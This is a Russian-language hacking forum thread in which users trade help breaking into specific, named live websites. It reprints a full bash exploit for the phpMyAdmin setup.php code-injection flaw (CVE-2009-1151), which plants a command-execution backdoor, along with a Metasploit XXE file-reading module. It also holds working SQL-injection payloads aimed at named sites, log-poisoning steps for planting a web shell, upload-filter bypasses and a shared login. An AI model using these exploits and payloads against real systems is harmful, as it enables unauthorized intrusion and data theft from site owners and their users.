Но выдает ошибку syntax error, unexpected T_String in "путь до эксплоита" on line 169

Запускал так, забивал в командную строку "Путь до php.exe" "Путь до эксплоита"

Прошу помощи..)!

Строка 169, более подробно


$pmaur l


Убери пробелы. Делаю ставку на то, что после исправления, будет ошибка указывающая на 191 строку =)

VY_CMa said:
Строка 169, более подробно
Убери пробелы. Делаю ставку на то, что после исправления, будет ошибка указывающая на 191 строку =)


Ок, спасибо!! В следующий раз буду внимательней.

Жаль только что эксплоит выстрелил неудачно

читается файл /etc/passwd через sql injection

как найти абсолютный путь к сайту?

Blacktell said:
читается файл /etc/passwd через sql injection
как найти абсолютный путь к сайту?


Говорю несколько способов.

Смотря какая CMS, для каждой есть свои способы

1) В куку сессии подставить спец символ, например "^"

2) Юзать гугл с текстом site:факме.рф intext:error

3) Пытаться подставлять в параметры зависящие от пользователя, т.е. head, post, get etc. всякую лабуду, которая может неправильно обработаться скриптом.

4) Найти phpinfo файл

5) Х*ярить сканером на файлы до посинения с помощью того же ArxScanSite с целью поиска файла оставленного мастером с таким содержанием: getcwd() или $SERVER['DOCUMENT_ROOT'] - если php конечно.

Blacktell said:
читается файл /etc/passwd через sql injection
как найти абсолютный путь к сайту?


Если нет вывода ошибок содержащих путь сайта, то следует использовать брутфорс конфигурационных файлов WEB-сервера скриптами типа Toolza и д.р.

К примеру CentOS, Fedora (Redhat-системы) и сервер Apache

/etc/httpd/conf/httpd.conf

Там смотришь секции DocumentRoot, VirtualHost.

Подскажите что за эксплоит\уязвимость рассматривается в этом видео _http://www.youtube.com/watch?v=-t5xWuCYhlw

Спасибо!

WendM said:
Подскажите что за эксплоит\уязвимость рассматривается в этом видео _http://www.youtube.com/watch?v=-t5xWuCYhlw
Спасибо!


CVE-2009-1151 phpMyAdmin 'setup.php' PHP Code Injection Vulnerability

/showpost.php?p=1330014&postcount=13

Nightmarе said:
Возникла такая ситуация.
Могу на сайт заливать любые файлы, но PHP код не выполняется, пишет ошибку 500, я пробовал .htaccess с содержимым:
allow from all
я пробовал возможные расширения типа php4 php5 phtml но всё одинаково 500, из чего я сделал вывод, что проблема в том, что файлы скажем заливаются с правами 644, а для запуска скрипта надо 755, права я поменять не могу...
заливал и SSI шелл с расширением shtml но команды не пашут (отключен видимо).
Какие варианты можно ещё попробовать кроме тех о которых я написал?


Ты как шелл заливаешь: через форму аплоада, через выполнение кода?

Если есть возможность выполнить код, то можно попробовать сделать коннект или бек через nc и посмотреть что там немудрено.

Добрый день. Разъясните пожалуйста по поводу вот этого эксплоита


PHP:


* Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $

* Date: Tue, 09 Jun 2009 14:13:34 GMT

*/

/* Servers configuration */

$i=0;

/* Server (config:root) [1] */

$i++;

$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo

'';system($_GET['c']);echo'';}if($_GET['p']){echo

'';eval($_GET['p']);echo'';};//'] = 'localhost';

$cfg['Servers'][$i]['extension'] ='mysqli';

$cfg['Servers'][$i]['connect_type'] ='tcp';

$cfg['Servers'][$i]['compress'] =false;

$cfg['Servers'][$i]['auth_type'] ='config';

$cfg['Servers'][$i]['user'] ='root';

/* End of servers configuration */

?>

Где в данном коде нужно указать ссылку на уязвимый phpmyadmin?

И еще, чем запускать данный эксплоит?


PHP:
#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11

# by pagvac (gnucitizen.org), 4th June 2009.

# special thanks to Greg Ose (labs.neohapsis .com) for discovering such a cool vuln,

# and to str0ke (milw0rm.com) for testing t his PoC script and providing feedback!

# PoC script successfully tested on the fol lowing targets:

# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0. 0 and 3.0.1.1

# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:

# 1) vulnerable version (obviously!): 2.11.x� �before 2.11.9.5

# and 3.x before 3.1.3.1 according to PMASA-2009-3

# 2) it *seems* this vuln can only be exp loited against environments

# where the administrator has chosen to ins tall phpMyAdmin following

# the *wizard* method, rather than manual m ethod: http://snipurl.com/jhjxx

# 3) administrator must have NOT deleted th e '/config/' directory

# within the '/phpMyAdmin/' directory. this is because this directory� �is

# where '/scripts/setup.php' tries to create 'config.inc.php' w hich is where

# our evil PHP code is injected 8)

# more info on:

# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php

# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]

then

echo"usage: ./$(basename $0) "

echo"i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"

exit

fi

if !which curl>/dev/null

then

echo"sorry but you need curl for this script to work!"

echo"on Debian/Ubuntu: sudo apt-get install curl"

exit

fi

functionexploit{

postdata="token=$1&action=save&configuration="\

"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22h ost%27]="\

"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\

"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22conne ct_type%22%3bs:3:"\

"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth _type%22%3bs:6:"\

"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b} }}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\

"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host %27%5d="\

"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cp re%3e%27%3b"\

"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\

"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3be val"\

"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\

"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3b s:6:%22"\

"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%2 2%3bs:8:"\

"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:% 22config"\

"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"



echo"[+] attempting to inject phpinfo() ..."

curl-ks-b$2-d"$postdata"--url"$3/scripts/setup.php">/dev/null

ifcurl-ks--url"$3/config/config.inc.php"|grep"phpinfo()">/dev/null

then

curl-ks--url"$3/config/config.inc.php">$flag

echo"[+] success! phpinfo() injected successfully! ou tput saved on$flag"

curl-ks-b$2-d $postdata2--url"$3/scripts/setup.php">/dev/null

echo"[+] you *should* now be able to remotely run� �shell commands and PHP code using your bro wser. i.e.:"

echo" $3/config/config.inc.php?c=ls+-l+/"

echo" $3/config/config.inc.php?p=phpinfo();"

echo" please send any feedback/improvements for this script to"\

"unknown.pentestergmail.com"

else

echo"[+] no luck injecting to $3/config/config.inc.php :("

exit

fi

}

# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"

token=`curl -ks -c$cookiejar--url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`

echo"[+] checking if phpMyAdmin exists on URL provi ded ..."

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null

ifgrep phpMyAdmin $cookiejar&>/dev/null

then

length=`echo -n$token| wc -c`

# valid form token obtained?

if [[$length-eq 32]]

then

echo"[+] phpMyAdmin cookie and form token received successfully. Good!"

# attempt exploit!

exploit $token $cookiejar$1

else

echo"[+] could not grab form token. you might want to try exploiting the vuln manually :("

exit

fi

else

echo"[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"

exit

fi

# milw0rm.com [2009-06-09]

С нетерпением жду ответа! Спасибо!

Nightmarе said:
Возникла такая ситуация.
Могу на сайт заливать любые файлы, но PHP код не выполняется, пишет ошибку 500, я пробовал .htaccess с содержимым:
allow from all
я пробовал возможные расширения типа php4 php5 phtml но всё одинаково 500, из чего я сделал вывод, что проблема в том, что файлы скажем заливаются с правами 644, а для запуска скрипта надо 755, права я поменять не могу...
заливал и SSI шелл с расширением shtml но команды не пашут (отключен видимо).
Какие варианты можно ещё попробовать кроме тех о которых я написал?


Для исполнения, права 755 должны быть у 'cgi' скриптов (Perl, etc), а для PHP скриптов достаточно только чтения в т.ч. 644.

Пробовал такой .htaccess?


Code:
php_flag engine on
AddType application/x-httpd-php .jpg



WendM said:
И еще, чем запускать данный эксплоит?


Данный эксплоит нужно запускать из командной строки Linux, *nix т.к. написан на Bash.

Перейдя по этой (http://www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/) ссылке можно увидеть пример запуска.

Добрый день. Возникла такая ситуация.

http://site.ru/homepage.php?page=4&userid=1

начал пробовать вот так

/homepage.php?page=4&userid=1'+order+by+10/*


MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' and make_public = 'Y' order by priority, title limit 10' at line 3, occured in query: "select * from bcs_wishlist,bcs_product where bcs_wishlist.product_id = bcs_product.product_id and userid = '1' order by 10/*' and make_public = 'Y' order by priority, title limit 10".
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' order by bwcore_member.username limit 5' at line 4, occured in query: "select bwcore_member.username,bwcore_member.avatar_url,bc s_fav_vendor.* from bcs_fav_vendor,bwcore_member where bwcore_member.userid = bcs_fav_vendor.userid_vendor and bcs_fav_vendor.userid = '1' order by 10/*' order by bwcore_member.username limit 5".


/homepage.php?page=4&userid=1' GROUP BY 10 --


MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Y' order by priority, title limit 10' at line 2, occured in query: "select * from bcs_wishlist,bcs_product where bcs_wishlist.product_id = bcs_product.product_id and userid = '1' GROUP BY 10 --' and make_public = 'Y' order by priority, title limit 10".
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by bwcore_member.username limit 5' at line 3, occured in query: "select bwcore_member.username,bwcore_member.avatar_url,bc s_fav_vendor.* from bcs_fav_vendor,bwcore_member where bwcore_member.userid = bcs_fav_vendor.userid_vendor and bcs_fav_vendor.userid = '1' GROUP BY 10 --' order by bwcore_member.username limit 5".


Что я не так делаю?

Gaben7 said:
Добрый день. Возникла такая ситуация.
http://site.ru/homepage.php?page=4&userid=1
начал пробовать вот так
/homepage.php?page=4&userid=1'+order+by+10/*
/homepage.php?page=4&userid=1' GROUP BY 10 --
Что я не так делаю?


не ставишь в конце пробел или он вырезается.

Д и крутить тут наверное ток как error-based, хотя может и выведет инфу по первому запросу.

Gaben7 said:
/homepage.php?page=4&userid=1' GROUP BY 10 --
Что я не так делаю?


Попробуй вот так:


Code:
/homepage.php?page=4&userid=1' union select 1,2,3,4,5 and 1='1
(подбирай кол-во полей в union практическим путём

или так


Code:
/homepage.php?page=4&userid=1' or @:=(@:=1)||@ group by concat((select @@version),!@)having@||min(@:=0) and 1='1

Добрый день. Возник вопрос по этому эксплоиту

phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection


PHP:
require 'msf/core'



class Metasploit3 'phpMyAdmin 3.3.X and 3.4 .X - Local File Inclusion via XXE Injection',

'Version' => '1.0',

'Description' => %q{Importing a specially-crafted XML file which contains an XML enti ty injection permits to retrieve a local fi le (limited by the privileges of the user running the web server).

The attacker must be l ogged in to MySQL via phpMyAdmin.

Works on Windows and L inux Versions 3.3.X and 3.4.X},

'References' =>

[

[ 'CVE', '2011-4107' ],

[ 'OSVDB', '76798' ],

[ 'BID', '50497' ],

[ 'URL', 'http://secforce.com/research/'],

],

'Author' => [ 'Marco Batista' ],

'License' => MSF_LICENSE

)



register_options(

[

Opt::RPORT(80),

OptString.new('FIL E', [ true, "File to read", '/etc/passwd']),

OptString.new('USE R', [ true, "Username", 'root']),

OptString.new('PAS S', [ false, "Password", 'password']),

OptString.new('DB' , [ true, "Database to use/create", 'hddaccess']),

OptString.new('TBL ', [ true, "Table to use/create and read the file to", 'files']),

OptString.new('APP ', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),

OptString.new('DRO P', [ true, "Drop database after reading file?", 'true']),

],self.class)

end



def loginprocess

# HTTP GET TO GET SESSION VA LUES

getresponse = send_request_cgi({

'uri' => datastore['APP']+'/index.php',

'method' => 'GET',

'version' => '1.1',

}, 25)



if (getresponse.nil?)

print_error("no response for #{ip}:#{rport}")

elsif (getresponse.code == 200)

print_status("Received #{getresponse.code} from #{rhost}:#{rp ort}")

elsif (getresponse and getrespo nse.code == 302 or getresponse.code == 301)

print_status("Received 302 to #{getresponse.headers['Location']}")

else

print_error("Received #{getresponse.code} from #{rhost}:#{rp ort}")

end



valuesget = getresponse.headers["Set-Cookie"]

varsget = valuesget.split(" ")



#GETTING THE VARIABLES NEEDED

phpMyAdmin = varsget.grep(/phpMyAdmin/).last

pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last

# END HTTP GET



# LOGIN POST REQUEST TO GET COOKIE VALUE

postresponse = send_request_cgi( {

'uri' => datastore['APP']+'/index.php',

'method' => 'POST',

'version' => '1.1',

'headers' =>{

'Content-Type' => 'application/x-www-form-urlencoded',

'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"

},

'data' => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'

}, 25)



if (postresponse["Location"].nil?)

print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")

tokenvalue = postrespons e.body.split("'").grep(/token/).first.split("=").last

else

tokenvalue = postrespons e["Location"].split("&").grep(/token/).last.split("=").last

end





valuespost = postresponse.header s["Set-Cookie"]

varspost = valuespost.split(" ")



#GETTING THE VARIABLES NEEDED

pmaUser = varspost.grep(/pmaUser-1/).last

pmaPass = varspost.grep(/pmaPass-1/).last



return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pma Pass}",tokenvalue

# END OF LOGIN POST REQUEST

rescue ::Rex::ConnectionRefused,� �::Rex::HostUnreachable, ::Rex::ConnectionTimeout , Rex::ConnectionError =>e

print_error(e.message)

rescue Timeout::Error, Errno::EI NVAL, Errno::ECONNRESET, EOFError, Errno::ECONN ABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREAC H =>e

print_error(e.message)

end



def readfile(cookie,tokenvalue)

#READFILE TROUGH EXPORT FUNCTIO N IN PHPMYADMIN

getfiles = send_request_cgi({

'uri' => datastore['APP']+'/export.php',

'method' => 'POST',

'version' => '1.1',

'headers' =>{

'Cookie' => cookie

},

'data' => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'

}, 25)



if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)

print_error("Error reading the file... not enough privile ge? login error?")

else

print_status("#{getfiles.body}")

end

end





def dropdatabase(cookie,tokenvalue)

dropdb = send_request_cgi({

'uri' => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',

'method' => 'GET',

'version' => '1.1',

'headers' =>{

'Cookie' => cookie

},

}, 25)



print_status("Dropping database: "+datastore['DB'])

end



def run

cookie,tokenvalue = loginprocess ()



print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")



craftedXML = "------WebKitFormBoundary3XPL01T\n"

craftedXML \n"

craftedXML]>\n"

craftedXML\n"

craftedXML\n"

craftedXML\n"

craftedXML\n"

craftedXML\n"

craftedXML\n"

craftedXML\n"

craftedXML\n"

craftedXML\n"

craftedXML&conteudo;\n"

craftedXML\n"

craftedXML\n"

craftedXML\n\n"

craftedXMLdatastore['APP']+'/import.php',

'method'=>'POST',

'version'=>'1.1',

'headers'=>{

'Content-Type'=>'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',

'Cookie'=>cookie

},

'data'=>craftedXML

},25)



readfile(cookie,tokenvalue)



if (datastore['DROP'] =="true")

dropdatabase(cookie,tokenvalue)

else

print_status("Database was not dropped: "+datastore['DB'])

end



end

end[/COLOR]

Что бы его использовать надо знать верный пароль и логин от phpmyadmin?

WendM

Строки


Code:
OptString.new('USER', [ true, "Username", 'root']),
OptString.new('PASS', [ false, "Password", 'password'])

как бы намекают на это...

BigBear

А смысл этого эксплоита тогда?

WendM said:
BigBear
А смысл этого эксплоита тогда?


Само название сплойта как бы намекает. Это LFI, чтение локальных файлов.

На сайте есть доступ к кконсоли Jboss. Через employmentscanner попытался залить jsp шелл, консоль выдала сообщение, что операция прошла успешно, но шелл так и не запустился. Собственно вопрос: как упаковать jsp в .war?

есть торент тракер на нем небольшой хостинг картинок заливка идет проверяя только расширения пытался залить шел с таким именем webshell.php.jpg потом переходил по ссылке и нечего )) как его открыть?вот ссыль http://tt.homelane.me/gallery.php

CyberKillerz said:
есть торент тракер на нем небольшой хостинг картинок заливка идет проверяя только расширения пытался залить шел с таким именем webshell.php.jpg потом переходил по ссылке и нечего )) как его открыть?вот ссыль http://tt.homelane.me/gallery.php


Попробуй обойти фильтр путем залива .htaccess

MaxFast said:
Попробуй обойти фильтр путем залива .htaccess


хмм попробывал залит просто .htacess не получилось только .htacess.png но это не помогло (

А ты пробовал header'ы менять при загрузке?

MaxFast said:
А ты пробовал header'ы менять при загрузке?


немного не понял немогли бы объяснить.

немного не понял немогли бы объяснить.


Допустим Content-type

а что изменится я вобще можно сказать чистый залил ) да там же только проверяется расширение и регулярными выражениями

Походу пмогло тк после залития открылись все почти деректории. хотя хз тк там перед залитием они переименовывают их походу так что неизвестно поч так произошло.

BigBear said:
Попробуй вот так:

Code:
/homepage.php?page=4&userid=1' union select 1,2,3,4,5 and 1='1
(подбирай кол-во полей в union практическим путём

или так

Code:
/homepage.php?page=4&userid=1' or @:=(@:=1)||@ group by concat((select @@version),!@)having@||min(@:=0) and 1='1



кол-во полей подобрать не смог


homepage.php?page=4&userid=1%27%20union%20select%201,2,3,4,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59 ,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,7 6,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92, 93,94,95,96,97,98,99,100,101,102,103,104,105,106,1 07,108,109,110,111,112,113,114,115,116,117,118,119 ,120,121,122,123,124,125,126,127,128,129,130,131,1 32,133,134,135,136,137,138,139,140,141,142,143,144 ,145%20and%201='


всё время ошибка


MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Y' order by priority, title limit 2' at line 2, occured in query: "select * from bcs_wishlist,bcs_product where bcs_wishlist.product_id = bcs_product.product_id and userid = '1' union select 1' and make_public = 'Y' order by priority, title limit 2".
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by bwcore_member.username limit 2' at line 3, occured in query: "select bwcore_member.username,bwcore_member.avatar_url,bc s_fav_vendor.* from bcs_fav_vendor,bwcore_member where bwcore_member.userid = bcs_fav_vendor.userid_vendor and bcs_fav_vendor.userid = '1' union select 1' order by bwcore_member.username limit 2".


побывал так

homepage.php?page=4&userid=1'+or+1=(select @@version)+and+1='1

ошибка исчезла но увы результат 0

Gaben7 said:
кол-во полей подобрать не смог
всё время ошибка
побывал так
homepage.php?page=4&userid=1'+or+1=(select @@version)+and+1='1
ошибка исчезла но увы результат 0


Попробуй


homepage.php?page=4&userid=1'or(select*from(select(name_const(version( ),1)),name_const(version(),1))a)and(1)='1


Браузер любой кроме firefox, да и пробелы убери

OxoTnik said:
Попробуй
Браузер любой кроме firefox, да и пробелы убери


пробовал в 3 браузерах результат тот же.

Там запятые фильтруются, backtick также фильтруется

попробовал так


PHP:
/homepage.php?page=4&userid=dd1'+union+select * from(select 0 a1) a1 join(select 0 a2) a2 join(select 0 a3) a3 join(select 0 a4) a4 join(select 0 a5) a5 join(select 0 a6) a6+union+select+* from(s elect username from bwcore_member limit 0)x join(select avatar_url from bwcore_member+limit +0)xx join(select * from bcs_fav_vendor+limit+ 0)xxx+--+a

ответ


Code:
Fatal error: MySQL error: Too many connections in /rn1/renderosity/public_html/classes/class.bw_Database.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 162

Дай линк, не мучай уже

Melfis said:
Дай линк, не мучай уже


да я давал удалили

www.renderosity.com

помогите плз тоже со скулей,вроде версия 5.5.14 но таблицы не хочет выводить


Code:
http://www.gameee.ru/iframe/rate.php?id=1543&i=1%20AND%20%28SELECT%203716%20FROM%28SELECT%20COU NT%28*%29,CONCAT%280x3a76746e3a,%28SELECT%20versio n%28%29%29,0x3a6f72743a,FLOOR%28RAND%280%29*2%29%2 9x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GR OUP%20BY%20x%29a%29--+f

Faaax said:
помогите плз тоже со скулей,вроде версия 5.5.14 но таблицы не хочет выводить

Code:
http://www.gameee.ru/iframe/rate.php?id=1543&i=1%20AND%20%28SELECT%203716%20FROM%28SELECT%20COU NT%28*%29,CONCAT%280x3a76746e3a,%28SELECT%20versio n%28%29%29,0x3a6f72743a,FLOOR%28RAND%280%29*2%29%2 9x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GR OUP%20BY%20x%29a%29--+f



Похоже и не выведет. Я смог покрутить только через Time-Based SQL

User: gameee_base@localhost

Sql: 5.5.14

DB: icmeee_base

Вот тебе 2 способа на выбор


Code:
http://www.gameee.ru/iframe/rate.php?id=1543&i=1+and+if(substring((version()),1,1)=5,BENCHMARK( 100000,MD5(0x41)),0)

http://www.gameee.ru/iframe/rate.php?id=1543&i=1+and+sleep(substring((version()),1,1))

Gaben7 said:
да я давал удалили
www.renderosity.com



Чёт меня постоянно в бан кидает. Надоели уже прокси.

Вот что накопал - последние 2 запроса не чекал тк, опять в бане.


Code:
http://www.renderosity.com/homepage.php?page=4&userid=1'+group+by+88+--+ FALSE
http://www.renderosity.com/homepage.php?page=4&userid=1'+group+by+87+--+ TRUE

http://www.renderosity.com/homepage.php?page=4&userid=1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62, 63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79 ,80,81,82,83,84,85,86,87+--+

http://www.renderosity.com/homepage.php?page=4&userid=1'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87+--+

Для авторизации можете заюзать мой акк BigBear-x/123456

Решил попрактиковаться в Php inj,вобщем взял сайт из раздачи-вот "http://macrohosting.ru/?"

Делаю запрос ../../../../etc/passwd (good),дальше пробую proc/self/environ выводится какая то елда в виде "?????????????????????????" Собственно вопрос:что это такое? и какие ещё есть способы залития шелла?. Читал про error.log но толком не понял как это делается.

to Testosteron

Если вкратце, то например вставляете в поле User-Agent мини шелл (например ), вызываете ошибку, данные записываются в error.log, дальше вы инклудите этот файл (если конечно нашли его месторасположение на сервере) и дальше работаете с ним "http://macrohosting.ru/?file=../../../../var/logs/error.log&e=phpinfo();"

UPD. Можете прочитать тут (http://www.xakep.ru/post/49508/?print=true) по этому поводу...

Да и не забудьте проверить wrappers!

Ага понятно. Спасибо за помощь)

Пошёл изучать

Подскажите где можна почитать о sql ?Как что подставлять.

2Sat-hacker прочитать можно про скуль почти от А до Я на крупном хек сайте /

Ваш КЭП!

shell_c0de а ссылочку на от а до я можна не могу найти.

/thread43966.html

www.bondware.com

помогите плз со скулей, версия '5.0.77-log'но таблицы не хочет выводить

/?1'or(select*from(select(name_const(version(),1)), na me_const(version(),1))a)and(1)='1


MySQL error: Duplicate column name '5.0.77-log', occured in query: "insert into bw30_tracking set ip = '235.25.206.61', referrer = '', page = '/index.php?1'or(select*from(select(name_const(versi on(),1)),name_const(version(),1))a)and(1)='1', date_visited = NOW(), user_agent = 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)', session = '068o5fjspb9abulhecd9rnrrt3', host = '235.25.206.61'".


побывал так


Code:
1'or(select+1+from(select+count(*),concat((select+ table_name+from+information_schema.tables+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tabl es+g roup+by+x)a)and(1)='1



MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from(select+count(*),concat((select+table_name+fr om+information_schema.tables+li' at line 4, occured in query: "insert into bw30_tracking set ip = '235.25.206.61', referrer = '', page = '/index.php?1'or(select+1+from(select+count(*),conca t((select+table_name+from+information_schema.table s+limit+0,1),floor(rand(0)*2))x+from+information_s chema.tabl%20es+group+by+x)a)and(1)='1', date_visited = NOW(), user_agent = 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)', session = '068o5fjspb9abulhecd9rnrrt3', host = '235.25.206.61'".


если так


Code:
/?1'or(select/**/1/**/from(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.columns/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.columns/**/group/**/by/**/x)a)and(1)='1



MySQL error: Duplicate entry '
CHARACTER_SETS1
' for key 1, occured in query: "insert into bw30_tracking set ip = '84.109.214.211', referrer = '', page = 'http://www.bondware.com/index.php?1'or(select/**/1/**/from(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.columns/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.columns/**/group/**/by/**/x)a)and(1)='1', date_visited = NOW(), user_agent = 'Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/10.0.1', session = 'r891pk3kpk3u6us67e2ppt7e22', host = 'bzq-84-109-214-211.red.bezeqint.net'".



то, что жирненькое, таблица limit 0,1

2Gaben7, чем тебе еще помочь? на рдоте те уже и так все сделали...

лимиты крути.

Товарищи Гуру-инъектры! Вобщем даже незнаю как вам на пальцах объяснить....

В скрипте запрос записывает данные, которые вписал юзер из формы, в БД.


Code:
INSERT INTO servers(map,ip,port,status) VALUES ($map,$ip,$port,$status);

Когда в поле ввожу одинарную ковычку, то при отправке формы выскакивает ошибка на странице:

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '32', `map`='ggg', `status`='1' WHERE `ip`' at line 3"

Я в поля уже и select @@version тыкал, оно просто отображает это как текст. Даже не знаю что и делать

Может кто подскажет как это дело раскрутить до конца?

всем привет! создаю сайт и параллельна изучаю sql. и натолкнулся на такую непонятку

на форумах везде проверки уязвимости ТИПА ?advanced=1`(при таком запросе у меня `-фильтруется), а вот при запросе ?`dvanced=1 страница немного видоизменяется

может ли это являтся уязвимостью и как проверить? проверка стандартным запросом - тоесть запрос после ?advanced=1. Типа ?advanced=1 union select... или же здесь запрос нужно вставлять между ? и advanced=1

apoclepsis said:
всем привет! создаю сайт и параллельна изучаю sql. и натолкнулся на такую непонятку
на форумах везде проверки уязвимости ТИПА ?advanced=1`(при таком запросе у меня `-фильтруется), а вот при запросе ?`dvanced=1 страница немного видоизменяется
может ли это являтся уязвимостью и как проверить? проверка стандартным запросом - тоесть запрос после ?advanced=1. Типа ?advanced=1 union select... или же здесь запрос нужно вставлять между ? и advanced=1



ты же обрабатываешь переменную advanced, а не `dvanced, Поэтому тут уязвимости быть не может, если конечно ты там не играешь с QUERY_STRING

а вид страницы меняется в следствии того что скрипт не получает переменную которую ждет, и не может формировать запрос к базе чтобы в дальнейшем вывести результат на страницу.

как то так

Konqi спасибо за быстрый ответ немного помог разобралься. я так понимаю что такого рода уязвимостей ?`advanced=1 не может быть впринципе.

apoclepsis said:
Konqi спасибо за быстрый ответ немного помог разобралься. я так понимаю что такого рода уязвимостей ?`advanced=1 не может быть впринципе.


во первых, этот символ " ` " вызывает синтаксическую ошибку, а не закрытие запроса, во вторых данный символ находится в имени переменной, и ваш скрипт попросту не увидет ГЕТ переменную advanced, и его обработать не сможет, так как вместо него отправили `advanced

фильтруйте переменную advanced, и больше ни о чем не думайте

если серверный язьк PHP, тогда..

для int используем


PHP:
$_GET['advanced'] =intval($_GET['advanced']);

для строк


PHP:
$_GET['advanced'] =mysql_real_escape_string($_GET['advanced']);

//конечно же если база mysql

Подскажите пожалуйста что нужно изучать чтоб вводить такие команды как в этом видео?

http://www.youtube.com/watch?feature=player_embedded&v=WLkftfmhAws#!

Изучал html и немножко php но это точно не эти языки.Спасибо.

to Sat-hacker

В данном видео используются - PHP, SQL, Bash.

cat1vo я так понял в командную строку водят sql подскажите где можна найти хорошие уроки по sql?

